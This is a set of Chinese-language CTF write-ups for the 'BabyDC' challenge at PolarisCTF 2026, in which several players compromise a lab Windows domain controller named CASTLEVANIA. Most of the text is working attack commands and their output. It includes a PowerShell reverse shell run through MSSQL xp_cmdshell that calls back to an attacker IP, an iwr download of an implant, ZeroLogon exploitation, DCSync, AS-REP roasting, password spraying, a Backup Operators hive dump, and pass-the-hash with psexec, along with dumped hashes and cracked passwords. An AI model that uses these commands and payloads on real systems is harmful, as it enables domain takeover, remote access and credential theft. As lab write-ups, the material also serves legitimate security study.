    full.add_argument("--vdi", type=Path, default=DEFAULT_VDI)
549
    full.add_argument("--vbox-home", type=Path, default=DEFAULT_VBOX_HOME)
550
    full.add_argument("--offline-dir", type=Path, default=DEFAULT_OFFLINE_DIR)
551
    full.add_argument("--vboxmanage", type=Path, help="Override VBoxManage.exe")
552
    full.add_argument("--wsl", type=Path, help="Override wsl.exe")
553
    full.add_argument("--wsl-distro", default="kali-linux")
554
    full.add_argument("--secretsdump", type=Path, help="Override secretsdump.py")
555
    full.add_argument("--boot-wait", type=int, default=25, help="Seconds to wait after starting the VM")
556
    full.set_defaults(func=do_full)
557

558
    verify = subparsers.add_parser("verify", help="Use the dump or a hash line to prove SYSTEM execution")
559
    verify.set_defaults(func=do_verify)
560

561
    return parser
562

563

564
def main() -> int:
565
    parser = build_parser()
566
    args = parser.parse_args()
567
    return args.func(args)
568

569

570
if __name__ == "__main__":
571
    try:
572
        raise SystemExit(main())
573
    except Exception as exc:
574
        print(f"[-] {exc}", file=sys.stderr)
575
        raise

最终答案

最终权限证明如下：

1
whoami    -> nt authority\system
2
hostname  -> CASTLEVANIA

对应证据文件为：

artifacts_secretsdump.txt
artifacts_system_whoami.txt
artifacts_system_hostname.txt
proof_system.png

如果只需要快速验证管理员 shell，不需要重新走完整链路，直接执行：

D:\Python\Python311\python.exe .\babydc_unified.py —python D:\Python\Python311\python.exe verify

如果需要从当前附件目录重新完整复现，直接执行：

D:\Python\Python311\python.exe .\babydc_unified.py —python D:\Python\Python311\python.exe full

平台漏洞（？？？）

漏洞描述

漏洞发现

接口写在前端中

1
const He = "/information";
2
var Oe = (s => (s.getNoticeInfo = He + "/getNoticeInfo",
3
s.GetRankInfoRequest = He + "/getRankInfo",
4
s.getTop10TeamRankForLine = He + "/getTop10TeamRankForLine",
5
s.adminGetInformationLog = He + "/adminGetInformationLog",
6
s.getOriginalSolveLog = He + "/getOriginalSolveLog",
7
s.getTeamBaseInfoForRank = He + "/getTeamBaseInfoForRank",
8
s.getUserBaseInfoForRank = He + "/getUserBaseInfoForRank",
9
s.getInformationLog = He + "/getInformationLog",
10
s.getMyTeamTendencyForLine = He + "/getMyTeamTendencyForLine",
11
s.getIdentityBaseOfRank = He + "/getIdentityBaseOfRank",
12
s.getRecentSubmitLog = He + "/getRecentSubmitLog",
13
s.getMatchTeamAndUserCount = He + "/getMatchTeamAndUserCount",
14
s.getChallengeSolveCountRank = He + "/getChallengeSolveCountRank",
15
s.getTeamRankWithChallengeInfo = He + "/getTeamRankWithChallengeInfo",
16
s.adminGetFlagCheatLog = He + "/adminGetFlagCheatLog",
17
s.adminExportScore = He + "/adminExportScore",
18
s.getWriteupTemplate = He + "/getWriteUpTemplate",
19
s))(Oe || {});
20
const Sa = s => E.post(Oe.getNoticeInfo, s)
21
  , Zn = s => E.post(Oe.GetRankInfoRequest, s)
22
  , vm = () => E.get(Oe.getTop10TeamRankForLine)
23
  , ym = s => E.post(Oe.adminGetInformationLog, s)
24
  , zi = s => E.post(Oe.getTeamBaseInfoForRank, s)
25
  , wm = s => E.post(Oe.getUserBaseInfoForRank, s)
26
  , Qn = s => E.post(Oe.getInformationLog, s)
27
  , bm = () => E.get(Oe.getMyTeamTendencyForLine)
28
  , Nm = () => E.get(Oe.getIdentityBaseOfRank)
29
  , Di = () => E.get(Oe.getRecentSubmitLog)
30
  , _m = () => E.get(Oe.getMatchTeamAndUserCount)
31
  , Cm = () => E.get(Oe.getChallengeSolveCountRank)
32
  , Sm = s => E.post(Oe.getTeamRankWithChallengeInfo, s)
33
  , Ei = s => E.post(Oe.getOriginalSolveLog, s)
34
  , km = s => E.post(Oe.adminGetFlagCheatLog, s)
35
  , Lm = s => E.post(Oe.adminExportScore, s)
36
  , Mm = () => E.get(Oe.getWriteupTemplate)
37
  , Tm = (s, t) => E.post("/user/adminGetUserList", {
38
    page_and_size: s,
39
    name: t
40
})
41
  , Ri = s => E.post("/user/adminGetUserInfo", {
42
    id: s
43
})
44
  , Im = s => E.post("/user/getUserLoginLog", {
45
    id: s
46
})
47
  , Pm = s => E.post("/user/getUserSubmitLog", {
48
    id: s
49
})
50
  , jr = s => E.post("/user/adminChangeBanStatus", s)
51
  , Fm = s => E.post("/user/adminSyncUserAndTeamInfo", s)
52
  , vr = () => E.get("/user/getUserInfo")

漏洞复现

scdyh（Zerologon）

端口扫描

1
| MIIDADCCAeigAwIBAgIQfKZK7ctznLZKnQZokrA1IzANBgkqhkiG9w0BAQUFADA7
2
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA | bABsAGIAYQBjAGswIBcNMjYwMzI4MDIwNjEzWhgPMjA1NjAzMjgwMjA2MTNaMDsx
3
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
4
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMxRhfGS
5
| jzRvPpZEACdpj+rr3nY/v+rnj/6f9csEPa9jZp9KqHr/jricKUs1ZrH4aNsUUh7T | jmTbThIyELZ9VO38kxo3Mw1gsatZ1aD78UMiA1nqdFZc7KxFokRM8JquD8xlhiH7
6
| kELXCvrRQ0trXWAWFbXvUyuBR4aOAOVqq3Hy5DmPdc+MrL1QmGGhRWa2EgiaL9vE
7
| JOoIcnZUF1Bn7bzq70r7R9a26XRBjBVPTGv0jC9vwNoF1C3tTgXeGb45vSzBU2c8 | /h52fxGJQSpALZQLRlwUOKcMD/xAmYF/jsfyWx8jFN/n5w94JZb2NS+m8frTCC5B
8
| HrK5GJvXSsOxXwkCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAlTvxAMrdDvLqMbaV
9
| llLhQMT9WlVAjKHKgijbROdxhm//Ew39VaI5ihBkBRZeg/4i7ItI+yXBnUX/Hugx
10
| qrItAekUivjN3+aJheNQu5kKBRYKczs41zpHfryUDPPf/pu5oHRxoTZXy+n3gAf+ | dOc9HLH8edRS3MWLg9blorr9BlJgMlFqiYRmXKSPnkco5TneYZwqPq4x1w6CQLfd
11
| HPMNJiLfk9tix6/w47u+Oicr0CkrlQm1X6IeW3fPEUw5+GjP6TTQ8DnNSu6k+Qgc | jjXlBUG+YXFSoT3aimXn7eXjyXxcoVXtsxEnDKaWRSkqqcH0N5O5Dn0Npl8c2W0I
12
| rUXTmA==
13
|_-----END CERTIFICATE-----

1
3268/tcp  open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP
2
(Domain: XMCVE.local, Site: Default-First-Site-Name)
3
3269/tcp  open  tcpwrapped    syn-ack ttl 128
4
9389/tcp  open  mc-nmf        syn-ack ttl 128 .NET Message Framing
5
49666/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
6
49667/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
7
49677/tcp open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
8
49678/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
9
49697/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
10
49738/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
11
MAC Address: 08:00:27:5F:60:98 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
12
Service Info: Host: CASTLEVANIA; OS: Windows; CPE: cpe:/o:microsoft:windows

1
Host script results:
2
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
3
| nbstat: NetBIOS name: CASTLEVANIA, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5f:60:98
4
(PCS Systemtechnik/Oracle VirtualBox virtual NIC)
5
| Names:
6
|   CASTLEVANIA<00>      Flags: <unique><active>
7
|   XMCVE<00>            Flags: <group><active>
8
|   XMCVE<1c>            Flags: <group><active>
9
|   CASTLEVANIA<20>      Flags: <unique><active>
10
|   XMCVE<1b>            Flags: <unique><active>
11
| Statistics:
12
|   08:00:27:5f:60:98:00:00:00:00:00:00:00:00:00:00:00
13
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
14
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
15
| smb2-security-mode:
16
|   3:1:1:
17
|_    Message signing enabled and required
18
| smb2-time:
19
|   date: 2026-03-28T02:13:29
20
|_  start_date: N/A
21
| p2p-conficker:
22
|   Checking for Conficker.C or higher...
23
|   Check 1 (port 46026/tcp): CLEAN (Timeout)
24
|   Check 2 (port 53618/tcp): CLEAN (Timeout)
25
|   Check 3 (port 62163/udp): CLEAN (Timeout)
26
|   Check 4 (port 51584/udp): CLEAN (Timeout)
27
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Kerberos 用户枚举

前面尝试了 smb、ldap、rpc 等协议的匿名枚举都失败了，看来还是得看看80端口 nuclei扫描的时候发现好像有短文件名解析的漏洞这个扫描结果让我联想到之前看到的一个靶机

发现 http://192.168.39.134/poo_connection.txt↗

获得初始凭证

虽然没有 xp_cmdshell 的权限，但是发现有连接

发现 POO_PUBLIC 是 sysadmin 权限，有 xp_cmdshell

反弹shell

1
exec ('xp_cmdshell ''powershell -nop -w hidden -ep bypass -c "$client = New-Object
2
System.Net.Sockets.TCPClient(''''192.168.39.142'''',4444);$stream = $client.GetStream();
3
[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0)
4
{$data = (New-Object System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + ''''PS '''' + (Get-Location).Path + ''''> '''';$sendbyte =
5
([System.Text.Encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Len gth);$stream.Flush()};$client.Close()"''') at POO_PUBLIC;

上线cs，这里讲道理来说有 Windows Defender，但是我也不确定我的免杀起作用了没有

1
iwr http://192.168.39.142:8000/ezad1.exe -OutFile C:\Windows\Tasks\ezad1.exe

SharpHound

没招了，丢个SharpHound上去跑一下

1
shell C:\Windows\Tasks\SharpHound.exe -c All --zipfilename loot.zip --OutputDirectory C:\Windows\Tasks

AS-REP Roasting

很容易能发现 MOWEN@XMCVE.LOCAL 可以 AS-REP Roast

1
GetNPUsers.py XMCVE.local/mowen -no-pass -dc-ip 192.168.39.134
2
hashcat -m 18200 mowen.asrep /usr/share/wordlists/rockyou.txt       #1maxwell

cs 派生一个 beacon，但是不知道为什么不能执行命令，猜下一步应该是 SeBackupPrivilege 提升权限，通过卷影副本提取 SAM/SYSTEM 文件的副本，问题就是没那到 mowen 用户的执行权限

zerologon

没想到原来能打 zerologon，这应该是一个非预期

置空域管hash后导出

pth 上线

但是我还是很纠结，mowen 到底怎么利用 SeBackupPrivilege 权限，没有 smbexec wmiexec winrmexec ，派生也没有拿到shell

”Always⌒（Zerologon）

题目信息

名称: BabyDC

类别: Web

分数: 1000

赛事: PolarisCTF 2026

环境配置

从提供的百度网盘链接下载了虚拟机镜像，并将其导入到 VirtualBox 7.2.0 中。虚拟机配置了NAT (Host-Only) 网络适配器，以便攻击机 (Kali Linux) 能够直接访问它。

信息收集

Nmap 网段+端口扫描

1
$ nmap -sV -sC 192.168.40.132
2

3
PORT     STATE SERVICE
4

5
53/tcp   open  domain
6
80/tcp   open  http
7
88/tcp   open  kerberos-sec
8
135/tcp  open  msrpc
9
139/tcp  open  netbios-ssn
10
389/tcp  open  ldap
11
445/tcp  open  microsoft-ds
12
464/tcp  open  kpasswd5
13
593/tcp  open  http-rpc-epmap
14
636/tcp  open  ldapssl
15
1433/tcp open  ms-sql-s
16
3268/tcp open  globalcatLDAP
17
3269/tcp open  globalcatLDAPssl

目标是一台 Windows Server 2019 域控制器 (Build 17763)。

通过 LDAP 获取域信息

对 rootDSE 进行匿名 LDAP 绑定，发现了以下信息：

域名: XMCVE.local

DC 主机名: CASTLEVANIA.XMCVE.local

林/域功能级别: 7 (Windows Server 2016)

SMB 枚举

匿名/访客 (Guest) SMB 登录被拒绝。空会话 (Null session) 同样被阻止。

Kerberos 用户枚举

使用 Kerberos AS-REQ 请求来枚举有效账户：

1
$ ldapsearch -x -H ldap://192.168.40.132 -s base
2

3
# defaultNamingContext: DC=XMCVE,DC=local
4

5
$ crackmapexec smb 192.168.40.132
6

7
SMB  192.168.40.132  445  CASTLEVANIA  [*] Windows 10 / Server 2019 Build 17763 x64
8
     (name:CASTLEVANIA) (domain:XMCVE.local) (signing:True) (SMBv1:False)

发现的有效账户包括： administrator , admin , castlevania , support。

所有账户都需要预身份验证（意味着无法进行 AS-REP Roasting 攻击）。

1
$ impacket-GetNPUsers XMCVE.local/ -dc-ip 192.168.40.132 -no-pass -usersfile users.txt
2

3
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
4
[-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set
5
[-] User castlevania doesn't have UF_DONT_REQUIRE_PREAUTH set
6
[-] User support doesn't have UF_DONT_REQUIRE_PREAUTH set
7
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED (guest, krbtgt - disabled)

漏洞发现

ZeroLogon (CVE-2020-1472)

使用 CrackMapExec 检查域控制器是否存在 ZeroLogon 漏洞：

该域控存在 CVE-2020-1472 (ZeroLogon) 漏洞。此漏洞利用了 Netlogon 协议中 AES-CFB8 实现的加密学缺陷，允许未经身份验证的攻击者将域控制器的计算机账户密码直接重置为空。

漏洞利用

第一步：ZeroLogon 漏洞利用

1
$ crackmapexec smb 192.168.40.132 -u '' -p '' -M zerologon
2

3
ZEROLOGO...  192.168.40.132  445  CASTLEVANIA  VULNERABLE
4

5
msf6> use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
6
msf6> set RHOSTS 192.168.40.132
7
msf6> set NBNAME CASTLEVANIA
8
msf6> run
9

10
[+] 192.168.40.132:49668 - Successfully authenticated
11
[+] 192.168.40.132:49668 - Successfully set the machine account (CASTLEVANIA$) password to:
12
    aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)

第二步：DCSync - 导出所有域哈希

1
$ impacket-secretsdump -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0' \
2
   -just-dc 'XMCVE.local/CASTLEVANIA$'@192.168.40.132
3

4
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
5

6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
7
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
8
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e3c4fe72e1383c576b4b3aeef4730a8:::
9
Alucard:1000:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
10
XMCVE.local\p2zhh:1104:aad3b435b51404eeaad3b435b51404ee:bc2bf43119e258bcecf71d44abc29db7:::
11
XMCVE.local\mowen:1105:aad3b435b51404eeaad3b435b51404ee:efb5fa49a38497a71e144f690860688e:::

第三步：哈希传递- 获取管理员 Shell

1
XMCVE.local\sales:1106:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
2
XMCVE.local\support:1107:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe::
3
:
4
XMCVE.local\it:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
5
XMCVE.local\hr:1109:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
6
XMCVE.local\admin:1110:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
7
XMCVE.local\sqlsvc:1112:aad3b435b51404eeaad3b435b51404ee:d93ef04edb808c5bce3a5bd67b936ca9:::
8
CASTLEVANIA$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

1
$ impacket-psexec -hashes ':d94f9831271e229dbc6e712097b63168' \
2
   'XMCVE.local/Administrator@192.168.40.132' 'whoami'
3

4
nt authority\system

1
$ impacket-wmiexec -hashes ':d94f9831271e229dbc6e712097b63168' \
2
   'XMCVE.local/Administrator@192.168.40.132' 'whoami'
3

4
xmcve\administrator

1
$ impacket-wmiexec -hashes ':d94f9831271e229dbc6e712097b63168' \
2
   'XMCVE.local/Administrator@192.168.40.132' 'hostname'
3

4
CASTLEVANIA

1
$ impacket-wmiexec -hashes ':d94f9831271e229dbc6e712097b63168' \
2
   'XMCVE.local/Administrator@192.168.40.132' 'net user administrator'
3

4
User name                   Administrator
5
Account active              Yes
6
Local Group Memberships     *Administrators
7
Global Group memberships    *Domain Users         *Domain Admins

攻击路径总结

1
*Enterprise Admins    *Schema Admins
2
                 *Group Policy Creator
3

4
未经身份验证的攻击者
5
   │
6
   ▼
7
[1] ZeroLogon (CVE-2020-1472)
8
   │ 利用 Netlogon AES-CFB8 缺陷绕过身份验证
9
   │ 将 CASTLEVANIA$ 计算机账户密码置空
10
   ▼
11
[2] DCSync
12
   │ 使用空密码的计算机账户凭据，通过 DRSUAPI
13
   │ 协议复制所有域密码哈希
14
   ▼
15
[3] 哈希传递 (Pass-the-Hash)
16
   │ 使用 Administrator 的 NTLM 哈希
17
   │ (d94f9831271e229dbc6e712097b63168) 进行身份验证并执行命令
18
   ▼
19
[4] 获取 CASTLEVANIA (DC) 的 SYSTEM / Domain Admin Shell

Pr0x1ma（Zerologon）

配环境

找ip

找到 192.168.56.101 然后扫一下

1
nmap -sn 192.168.56.0/24

nmap

1
nmap -sV -sC -A -oN dc1_scan.txt 192.168.56.101

分析

1
主机信息
2
主机名：CASTLEVANIA
3
域名：XMCVE.local
4
端口与服务
5
7、80：IIS 10（Web 服务）
6
88：Kerberos（身份验证服务）
7
389 / 3268：LDAP / 全局编录（域目录服务）
8
445：SMB（文件共享服务）
9
1433：Microsoft SQL Server 2016 SP2

Web

但是没啥东西，在用dirsearch看看

1
curl -I 192.168.56.101

dirsearch

也没什么东西

Kerberos

不能进行AS-REP Roasting

MSSQL

没用，空密码登录也不行

DNS

啥也没有

ZeroLogon

检测

找了半天发现ZeroLogon是可行的

利用

找个能利用的脚本，清空密码

DCSync

DCSync拿Administrator的哈希

Getshell

哈希传递拿shell

lpppp（域用户-弱口令）

题目信息

题目名称：BabyDC

目标地址：192.168.56.155

本题没有提供最终 flag.txt，通关目标是获取最高权限。实际打通后，不仅拿到了目标主机的 NT AUTHORITY\SYSTEM，还进一步导出了整套域凭据，因此可以认为整台域控已经被完全接管。

整体判断

这题最关键的地方不在 Web 页面本身，而在于它是一台对外暴露了多种企业服务的域控。最开始做端口识别时，可以看到同时开放了 80、88、389、445、1433 等典型的 AD 与 MSSQL 服务端口。看到这种端口组合，应该立刻意识到这不是单纯的 Web 打点题，而是一个典型的“从弱口令或目录服务入手，逐步拿域内高权限”的内网题。

真正打通这题的主链如下：

先识别主机角色，确认这是一台域控。
用 Kerberos 与 SMB 做小规模弱口令喷洒，拿到首个低权域账户。
用这个低权账户查询 LDAP，找到开启“不需要 Kerberos 预认证”的用户。
对该用户做 AS-REP Roast，离线爆破得到更高价值账户口令。
利用该账户属于 Backup Operators 这一点，远程备份注册表 hive。
将 SAM、SYSTEM、SECURITY 拉回本地离线提取秘密，拿到本地 Administrator 哈希和服务账号口令。
使用 Administrator 的 NTLM 直接 Pass-the-Hash 到目标，获得 SYSTEM。
再用已经拿到的高权限继续导出整套域凭据，完成整题。

整个过程里，真正起决定作用的知识点只有三个：

域用户弱口令喷洒
AS-REP Roast
Backup Operators 结合 reg.py backup 远程导出 hive

其它分支虽然有探测，但并没有用于最终利用链，这里不写。

第一步：端口识别，确认目标是一台域控

先用 nmap 对目标做标准服务识别：

nmap -Pn -sC -sV -T4 192.168.56.155

这条命令的作用如下：

-Pn 表示不做主机发现，直接认为目标在线，避免 ICMP 被过滤导致误判。
-sC 调用常用 NSE 脚本，补充基础服务信息。
-sV 探测服务版本。
-T4 提高扫描速度。

关键结果如下：

1
53/tcp   open  domain        Simple DNS Plus
2
80/tcp   open  http          Microsoft IIS httpd 10.0
3
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
4
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
5
445/tcp  open  microsoft-ds?
6
1433/tcp open  ms-sql-s      Microsoft SQL Server 2016 SP2
7

8
Domain: XMCVE.local
9
Host: CASTLEVANIA.XMCVE.local

看到这个结果时，基本可以直接下结论：

88、389、445 说明这是 AD 环境。
389 的返回里已经给出了域名 XMCVE.local。
主机名是 CASTLEVANIA.XMCVE.local。
1433 说明这台机子还跑了 SQL Server。

这一步非常重要，因为后面所有账号格式、认证方式、攻击顺序都要围绕“域控”来设计。也正因为它是域控，所以一旦打穿，收益会非常高。

第二步：小规模弱口令喷洒，拿到第一个可用域账户

既然这是域环境，直接盲扫 Web 没有明显入口时，最自然的思路就是先找一个最低成本的可用身份。这里没有上大字典，而是只做了小规模、高命中率的喷洒，避免无意义浪费时间。

先用 GetNPUsers.py 对一小批可能存在的用户做探测：

GetNPUsers.py XMCVE.local/ -dc-ip 192.168.56.155 -no-pass -usersfile /tmp/babydc_users.txt

这条命令的作用不是爆密码，而是利用 Kerberos 的错误回显区分“用户存在”和“用户不存在”。

从结果里可以确认如下用户是存在的：

admin
support
sqlsvc
castlevania
alucard

有了有效用户名后，再用 netexec 对 SMB 做一个非常小的弱口令喷洒：

1
netexec smb 192.168.56.155 \
2
  -u /tmp/babydc_valid_users.txt \
3
  -p /tmp/babydc_passwords.txt \
4
  --continue-on-success

这里的思路很明确：

只打一小批最常见口令，如 Password123!、P@ssw0rd! 以及用户名同密码变体。
用 --continue-on-success 保证一个账户命中后继续跑完，看看是否存在统一弱口令。

关键命中结果如下：

1
[+] XMCVE.local\admin:Password123!
2
[+] XMCVE.local\support:Password123!

这一步说明题目确实存在统一弱口令设计，而且此时已经拥有了两个可用域用户。虽然它们还不是高权限，但已经足够进入 LDAP 查询阶段。

第三步：查询 LDAP，锁定真正有利用价值的用户

有了 admin:Password123! 之后，下一件事不是继续无脑喷更多口令，而是立刻转向 LDAP 收集高价值用户属性。

这里使用：

netexec ldap 192.168.56.155 -u admin -p ‘Password123!’ —users

这个命令会把域中的用户枚举出来，并附带一些基础属性，比如最近修改密码时间、描述等。关键输出如下：

1
Administrator
2
Alucard
3
p2zhh
4
mowen
5
sales
6
support
7
it
8
hr
9
admin
10
sqlsvc    SQL Server Service Account

接着进一步查询 mowen 的属性：

1
ldapsearch -x -H ldap://192.168.56.155 \
2
  -D 'XMCVE\admin' -w 'Password123!' \
3
  -b 'DC=XMCVE,DC=local' \
4
  '(sAMAccountName=mowen)' \
5
  pwdLastSet description memberOf userAccountControl

关键结果是：

1
memberOf: CN=Backup Operators,CN=Builtin,DC=XMCVE,DC=local
2
userAccountControl: 4260352

这里的 4260352 非常关键。把它转成十六进制是：

0x410200

它包含了以下位：

NORMAL_ACCOUNT
DONT_EXPIRE_PASSWORD
DONT_REQ_PREAUTH

其中真正决定利用方向的是 DONT_REQ_PREAUTH。这意味着 mowen 不需要 Kerberos 预认证，可以直接做 AS-REP Roast。与此同时，它还属于 Backup Operators，说明即使这个账户不是管理员，也非常可能具备系统级备份相关能力。这两个条件叠加，使得 mowen 立刻成为整题最关键的突破口。

第四步：对 mowen 做 AS-REP Roast，离线爆出真实口令

确定 mowen 开启了 DONT_REQ_PREAUTH 后，下一步就是直接请求它的 AS-REP 响应并离线爆破。

先生成哈希：

1
echo mowen >/tmp/mowen_only.txt
2
GetNPUsers.py XMCVE.local/ \
3
  -dc-ip 192.168.56.155 \
4
  -no-pass \
5
  -request \
6
  -format hashcat \
7
  -outputfile /tmp/mowen_asrep.hash \
8
  -usersfile /tmp/mowen_only.txt

生成出的哈希大致如下：

$krb5asrep$ 23 $mowen@XMCVE.LOCAL:2ebf4c95b4b4915427a335c63359292f$ …

然后使用 hashcat 离线爆破：

1
hashcat -m 18200 /tmp/mowen_asrep.hash /usr/share/wordlists/rockyou.txt --force
2
hashcat -m 18200 /tmp/mowen_asrep.hash --show --force

这里 -m 18200 对应的就是 Kerberos 5 AS-REP 哈希模式。

最终爆破结果：

mowen:1maxwell

也就是说，我们拿到了第二个更高价值的域用户：

XMCVE\mowen : 1maxwell

这一跳是整道题最核心的转折点。前面的 admin/support 只是拿来查询 LDAP 的低权账号，真正能把题做通的是 mowen。

第五步：验证 mowen 的权限，确认 Backup Operators 利用可行

拿到 mowen:1maxwell 后，第一件事就是判断它到底有多大权限。这里使用：

netexec smb 192.168.56.155 -u mowen -p ‘1maxwell’ —shares

返回结果如下：

1
ADMIN$          READ
2
C$              READ,WRITE
3
IPC$            READ
4
NETLOGON        READ
5
SYSVOL          READ

这个结果说明两件事：

mowen 确实拥有非常强的文件级能力。
它对 C$ 具备读写权限，这和 Backup Operators 的身份完全吻合。

但此时还不能直接等价于“远程命令执行”。随后测试了 wmiexec.py、atexec.py 等方式，结果都返回 rpc_s_access_denied，说明它并不具备完整的远程执行 ACL。因此正确的思路不是强行打 WMI/计划任务，而是回到 Backup Operators 的本质能力：远程备份系统数据。

第六步：利用 Backup Operators 远程备份注册表 hive

既然 mowen 属于 Backup Operators，最稳的利用方式就是使用 reg.py 远程备份系统注册表 hive。前面先确认一下远程注册表能否访问：

reg.py XMCVE.local/mowen:‘1maxwell’@192.168.56.155 query -keyName ‘HKLM\SAM’

1
HKLM\SAM
2
HKLM\SAM\SAM

这说明远程注册表访问是通的，后续可以尝试保存。

接下来直接使用 backup 动作一次性保存三份关键 hive：

reg.py XMCVE.local/mowen:‘1maxwell’@192.168.56.155 backup -o ‘C:\Windows\Temp’

关键结果如下：

1
[*] Saved HKLM\SAM to C:\Windows\Temp\SAM.save
2
[*] Saved HKLM\SYSTEM to C:\Windows\Temp\SYSTEM.save
3
[*] Saved HKLM\SECURITY to C:\Windows\Temp\SECURITY.save

这一步的本质是：

SAM 保存本地账号哈希
SYSTEM 里有 bootKey，用于解密 SAM/SECURITY
SECURITY 里有 LSA Secrets、服务密码、缓存凭据等高价值秘密

很多人做到这里会卡住，因为他们试图直接走远程执行。但本题真正的提权关键不是远程执行，而是“先把秘密导出来，再离线提取”。

第七步：拉回本地并离线提取秘密

先把远程保存好的三个文件拉回本地：

1
netexec smb 192.168.56.155 -u mowen -p '1maxwell' --get-file 'Windows\Temp\SAM.save' /tmp/SAM.save
2
netexec smb 192.168.56.155 -u mowen -p '1maxwell' --get-file 'Windows\Temp\SYSTEM.save' /tmp/SYSTEM.save
3
netexec smb 192.168.56.155 -u mowen -p '1maxwell' --get-file 'Windows\Temp\SECURITY.save' /tmp/SECURITY.save

然后使用 secretsdump.py 进行本地离线提取：

secretsdump.py -sam /tmp/SAM.save -system /tmp/SYSTEM.save -security /tmp/SECURITY.save LOCAL

这里的关键输出非常重要：

1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
2

3
[*] _SC_MSSQLSERVER
4
(Unknown User):Sql!2026

这个结果意味着我们一次性拿到了两个关键资产：

Administrator 的 NTLM 哈希d94f9831271e229dbc6e712097b63168
SQL Server 服务密码_SC_MSSQLSERVER = Sql!2026

先说第二个。服务密码后来验证对应的是域用户 sqlsvc，说明 SECURITY hive 里确实成功导出了服务机密：

XMCVE\sqlsvc : Sql!2026

但这条线虽然能登录 SMB，却没有直接带来远程执行，所以真正决定通关的仍然是第一个东西，也就是 Administrator 的 NTLM 哈希。

第八步：使用 Administrator 哈希直接 Pass-the-Hash，拿到 SYSTEM

拿到 Administrator 的 NTLM 哈希后，最直接的做法就是 PTH。这里使用 psexec.py：

1
psexec.py \
2
  -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168 \
3
  ./Administrator@192.168.56.155 \
4
  'whoami'

这条命令里有几个点需要说明：

LM hash 这里用的是空 LM 的固定占位值 aad3b435b51404eeaad3b435b51404ee
NT hash 就是刚刚从 SAM 中提取出来的管理员哈希
./Administrator@192.168.56.155 表示使用本地上下文账号发起认证

关键返回如下：

1
[*] Found writable share ADMIN$
2
[*] Uploading file EXviAwVA.exe
3
[*] Creating service Uchr on 192.168.56.155.....
4
[*] Starting service Uchr.....
5
nt authority\system

为什么这说明已经拿下最高权限？

因为 psexec.py 的原理是：

先通过 SMB 把一个服务可执行文件上传到目标机
再通过服务控制管理器创建并启动临时服务
服务默认以 LocalSystem 运行

也就是说，只要这一套链条完整走通，并且最后执行结果回显 nt authority\system，就已经不是普通管理员权限，而是标准的 Windows 最高本地权限。

为了把证据补完整，还进一步执行了：

1
psexec.py \
2
  -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168 \
3
  ./Administrator@192.168.56.155 \
4
  'whoami /all'

返回结果里明确出现：

1
User Name
2
nt authority\system
3

4
SeDebugPrivilege                 Enabled
5
SeImpersonatePrivilege           Enabled
6
SeTcbPrivilege                   Enabled

到这里就可以非常明确地确认，本题的最高权限已经拿到。

第九步：在已拿到高权限后继续导出整套域凭据

虽然题目到拿下 SYSTEM 就已经结束了，但因为目标本身是一台 DC，所以在已有管理员哈希的情况下，还可以顺手把整套域凭据导出来，进一步证明整台域控已经完全接管。

这里直接使用：

1
secretsdump.py \
2
  -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168 \
3
  ./Administrator@192.168.56.155

关键输出如下：

1
krbtgt:502:...:1e3c4fe72e1383c576b4b3aeef4730a8:::
2
Alucard:1000:...:d94f9831271e229dbc6e712097b63168:::
3
XMCVE.local\mowen:1105:...:efb5fa49a38497a71e144f690860688e:::
4
XMCVE.local\admin:1110:...:2b576acbe6bcfda7294d6bd18041b8fe:::
5
